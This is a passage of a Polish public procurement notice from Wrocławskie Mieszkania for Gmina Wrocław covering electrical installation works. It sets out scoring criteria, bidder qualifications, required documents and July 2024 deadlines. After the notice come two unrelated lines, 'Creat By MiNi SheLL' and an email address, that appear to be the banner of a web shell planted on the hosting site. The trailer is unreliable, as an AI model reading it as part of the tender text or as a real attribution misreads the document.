obliczenia punktów oraz do zawieranej umowy najwyższą liczbę wpisanego przedziału.<br/>3)	Kryterium społeczne (S) - waga (znaczenie) 5 pkt<br/> Zatrudnienie przy realizacji zamówienia, w części dotyczącej robót budowlanych ,nieprzerwalnie przez cały okres wykonywania robót budowlanych, osób bezrobotnych na podstawie stosunku pracy zgodnie z przepisami Kodeksu pracy w wymiarze minimum ¼ etatu lub umowy cywilnoprawnej. <br/>Za zatrudnienie 1 lub więcej osób bezrobotnych Wykonawca może otrzymać maksymalnie 5 pkt.<br/>Deklaracja zatrudnienia osób bezrobotnych przez Wykonawcę zawarta w ofercie (w formularzu ofertowym) zostanie oceniona w następujący sposób:<br/>Niezatrudnienie żadnej osoby bezrobotnej – 0 pkt.<br/>Zatrudnienie 1 osoby bezrobotnej – 2,5 pkt.<br/>Zatrudnienie więcej niż 1 osoby bezrobotnej – 5 pkt.<br/>W przypadku, gdy Wykonawca nie wskaże w ofercie ilości osób, o których mowa powyżej Zamawiający przyjmie ilość osób 0 i przyzna 0 pkt w tym kryterium.<br/>Kryterium rozpatrywane będzie na podstawie zadeklarowanego - podanego w formularzu, zatrudnia nieprzerwalnie przez cały jego okres bezrobotnych. Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona wg poniższego wzoru: L = C + S + G<br/>C - ilość punktów za cenę oferty brutto, S – ilość punktów za kryterium społeczne, G - ilość punktów za wydłużenie okresu gwarancji na roboty budowlane, <br/>Za najkorzystniejszą ofertę zostanie uznana ta, która uzyska największą łączną liczbę punktów w ww. kryteriach.<br/>Ocena punktowa będzie dotyczyć ofert niepodlegających odrzuceniu.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Wydłużenie okresu gwarancji na roboty budowlane (G) powyżej wymaganego przez Zamawiającego okresu minimalnego wynoszącego 36 miesięcy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">35</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium społeczne (S) tj. zatrudnienie do realizacji zamówienia bezrobotnych w rozumieniu ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">5</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na zasadach określonych w rozdz. VIII SWZ, oraz spełniają określone przez Zamawiającego poniżej warunki udziału w postępowaniu.<br/>2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym: Zamawiający nie stawia warunku w powyższym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: Zamawiający nie stawia warunku w powyższym zakresie.<br/>3)	sytuacji ekonomicznej lub finansowej: Zamawiający nie stawia warunku w powyższym zakresie.<br/>4) zdolności technicznej lub zawodowej: <br/><br/>Dla zadania nr 1 i zadania nr 2:<br/>w zakresie osób skierowanych przez wykonawcę do realizacji zamówienia<br/>a) Zamawiający uzna, że wykonawca spełnia warunek w zakresie osób skierowanych przez wykonawcę do realizacji zamówienia, jeżeli Wykonawca wykaże, że dysponuje następującymi osobami, które będą uczestniczyć w wykonywaniu zamówienia tj.<br/>- co najmniej jedną osobą, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi o specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i energetycznych oraz doświadczenie zawodowe w kierowaniu robotami budowlanymi w wymiarze minimum 3 lat, osoba to będzie pełnić funkcję kierownika budowy.<br/><br/>W przypadku składania przez Wykonawcę oferty na więcej niż jedno zadanie (część), te same osoby spełniające powyższe wymagania mogą być potwierdzeniem spełniania warunku w każdym zadaniu, na które Wykonawca złoży ofertę. <br/><br/>Przez uprawnienia należy rozumieć: uprawnienia budowlane, o których mowa w Rozporządzeniu Ministra Infrastruktury i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie.<br/><br/>w zakresie doświadczenia<br/>b) Zamawiający uzna, że wykonawca spełnia warunek w zakresie doświadczenia, jeżeli wykaże, że w okresie ostatnich pięciu lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie – wykonał w sposób należyty, zgodnie z przepisami prawa budowlanego i prawidłowo ukończył co najmniej jedną robotę budowlaną polegającą na budowie lub wymianie instalacji elektrycznej co najmniej w 10 lokalach w ramach jednej umowy w okresie nie dłuższym niż 24 miesiące o całkowitej wartości umowy nie mniejszej niż 300 000,00 zł brutto. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego:<br/><br/>a) Oświadczenie na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego Pzp oraz art. 5k rozporządzenia (UE) nr 833/2014 w brzmieniu nadanym rozporządzeniem 2022/576 dotyczącego środków ograniczających w związku z działaniami Rosji destabilizującymi sytuację na Ukrainie (wzór stanowi załącznik do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia spełniania przez wykonawcę warunków udziału w postępowaniu:<br/><br/>a)	wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich przedmiotu, rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane (wzór stanowi załącznik SWZ), oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty;<br/>Uwaga: Jeżeli wykonawca powołuje się na doświadczenie w realizacji robót budowlanych wykonywanych wspólnie z innymi wykonawcami w/w wykaz dotyczy robót budowlanych, w których wykonaniu wykonawca ten bezpośrednio uczestniczył.<br/><br/>b)	wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (wzór stanowi załącznik do SWZ).<br/><br/>Rozporządzenie Ministra Rozwoju, Pracy i Technologii z dnia 23.12.2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r. poz. 2415 z dnia 30.12.2020 r.).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców (m.in. konsorcjum, spółka cywilna): Podmiotowe środki dowodowe i oświadczenia składane w celu potwierdzenia braku podstaw do wykluczenia oraz potwierdzenia spełniania warunków udziału w postępowaniu, składa i podpisuje każdy z wykonawców wspólnie ubiegających się o zamówienie lub wyznaczony Pełnomocnik. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Przesłani zmiany umowy określone zostały w załączniku nr 4 do SWZ tj. Projektowanych postanowieniach umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-04 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://wm-wroc.logintrade.net/rejestracja/ustawowe.html</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-04 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <h3 class="mb-0">8.6.) Maksymalna liczba wykonawców, którzy zostaną zaproszeni do negocjacji: <span class="normal">3</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> Zamawiający, w celu ograniczenia liczby wykonawców, których zaprosi do negocjacji, zastosuje kryterium selekcji w postaci kryterium ceny, o którym mowa w rozdziale XVII SWZ, tzn. <br/>do negocjacji zostaną zaproszeni maksymalnie trzej wykonawcy, którzy zadeklarowali najniższe ceny za wykonanie przedmiotu zamówienia. <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający: Gmina Wrocław, Plac Nowy Targ 1-8, 50-141 Wrocław, w imieniu której na podstawie pełnomocnictwa Prezydenta Wrocławia Nr 31/I/Z/19 z dnia 12 września 2019 r. działają Wrocławskie Mieszkania Sp. z o.o. z siedzibą przy ul. Namysłowskiej 8, 50-304 Wrocław, tel. 71 323 57 00. Szczegółowe informacje dot. warunków udziału, podstaw wykluczenia oraz oświadczeń i dokumentów potwierdzających udziału w postępowaniu oraz braku podstaw wykluczenia są określone w SWZ.<br/><br/>Oferta pod rygorem nieważności sporządzona w postaci elektronicznej i opatrzona kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym musi zawierać: <br/>1)	Formularz ofertowy (załącznik nr 1 do SWZ), <br/>2)	Kosztorysy ofertowe, dla poszczególnych typów mieszkań M1, M2, M3 – opisanych w pkt.5. rozdział III SWZ,<br/>3)	Oświadczenie z art. 125 ust.1 ustawy Pzp o niepodleganiu wykluczeniu oraz oświadczenie o spełnianiu warunków udziału w postępowaniu (wzór załącznik nr 2a, 2b, 2c do SWZ) w zakresie wskazanym w SWZ,<br/>4)	Pełnomocnictwo (jeżeli dotyczy),<br/>5)	Zobowiązanie podmiotu udostępniającego zasoby (wzór stanowią załączniki nr 7a, 7b,<br/> do SWZ) (jeżeli dotyczy),<br/>6)	Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodne <br/>z art. 117 ust. 4 ustawy Pzp (załącznik nr 8 do SWZ),<br/>7)	Wykaz rozwiązań równoważnych (jeżeli dotyczy)<br/>8)	Zastrzeżenie tajemnicy przedsiębiorstwa (jeżeli dotyczy)<br/><br/> <br/>Osobą uprawnioną do porozumiewania się z Wykonawcami w sprawach związanych z procedurą postępowania o udzielenie zamówienia jest p. Marta Matuszczyk; nr tel. 71 323 57 19. W korespondencji kierowanej do Zamawiającego Wykonawcy powinni posługiwać się numerem postępowania. <br/>Wykonawca przed zawarciem umowy w szczególności:<br/>- poda wszelkie informacje niezbędne do wypełnienia treści umowy na wezwanie zamawiającego<br/>- wniesie zabezpieczenie należytego wykonania umowy.<br/><br/>Wykonawca, najpóźniej w dniu podpisania umowy, zobowiązany jest do przedłożenia Zamawiającemu<br/>1) wykazu pojazdów, których będzie używał do realizacji zamówienia, określając w nim, które z pojazdów są pojazdami elektrycznymi lub pojazdami napędzanymi gazem ziemnym; <br/>2)	kopii Polisy/dokumentów ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności obejmującej przedmiot zamówienia, na kwotę nie mniejszą niż wartość własnej oferty, w całym okresie realizacji umowy wraz z potwierdzeniem opłaty składki.

Creat By MiNi SheLL
Email: jattceo@gmail.com